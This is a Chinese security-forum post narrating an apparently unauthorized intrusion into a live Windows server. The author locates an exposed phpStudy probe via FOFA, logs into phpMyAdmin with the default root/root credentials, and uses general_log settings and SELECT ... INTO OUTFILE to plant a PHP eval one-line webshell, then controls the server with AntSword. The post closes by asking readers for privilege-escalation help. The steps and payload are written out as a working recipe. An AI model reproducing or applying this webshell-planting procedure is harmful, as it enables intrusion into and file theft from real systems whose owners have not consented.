从漏洞复现到实战getshell

ring_ring   ·   发表于 2020-09-04 13:16:48   ·   实战纪实

前提

之前有过几次实战getshell了,但是管理员比较敏感,解决不了就下线,趁着这次管理员还没有下线,赶紧拿出来投个稿。

信息收集

因为偶然看到了phpstudy探针,所以就去fofa搜索了一下:


(因为是很久以前的洞了,所以大部分网站都补了,我应该算是捡了个漏)
大概页面如下:

在这里,需要注意的是绝对路径,服务器操作系统,php版本,ip
绝对路径:G:/www/index.php
操作系统:Windows NT HB2008 6.1 build 7601
php版本:5.2.17

测试弱口令

弱口令:root/root或者root/空(不过最新的phpmyadmin貌似不允许用root登录)
当我填入root/root时,进行账号密码测试:


一看连接到mysql数据库正常,开心,访问url/phpmyadmin


同样用root和root登录上

<h1>查看当前权限</h1>
习惯性查看当前用户权限:

  1. select user();


一看,漂亮,root权限,那不是代表我们可以为所欲为?
但是我们需要写入一句话,那么需要知道该服务器是否可以写入文件:

  1. show variables like '%general%'; #查看配置


写入文件权限开启,并且知道了写入路径;
补充:
如果不是root那就需要一系列提权操作,社区里各位大哥讲得很详细,我就不赘述了。
如果原本写入文件权限没有开启,就需要让它开启,命令如下:

  1. set global general_log = on; #开启general log模式
  2. set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell地址

插入一句话木马

在信息收集那步(或者通过查询写入文件权限的时候),我们已经知道了绝对路径,就随便找一个数据库,插入一句话木马,如下:

  1. select '<?php echo "a";@eval($_POST[a]);?>' into outfile 'G:\\www\\shelll.php';

之后连接直接连接蚁剑:

就这样,我几乎可以浏览这个电脑上除了c盘以外的盘的所有文件,并对其进行上传下载文件。

后话

大概过了几天,管理员发现了,于是加了D盾。
shell没删,但是权限极低。只允许在当前的G盘活动
探针没关,但是写入文件会被D盾拦截

一点一点试了之后,发现这个过滤的机制很狗,D盾过滤把select的s换成了_,然后一旦执行除表名之外的查询就被拦截,也不允许创建库表之类的。
暂时就止步于此了,对于windows提权我也不是很熟,想知道各位表哥之后怎么对它进行提权。

用户名金币积分时间理由
admin 30.00 0 2020-09-07 11:11:37 鼓励原创!

打赏我,让我更有动力~

1 Reply   |  Until 2020-10-13 | 1171 View

lieren
发表于 2020-10-13

666666666
学到了怎么找漏洞主机

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2023 掌控者 All Rights Reserved.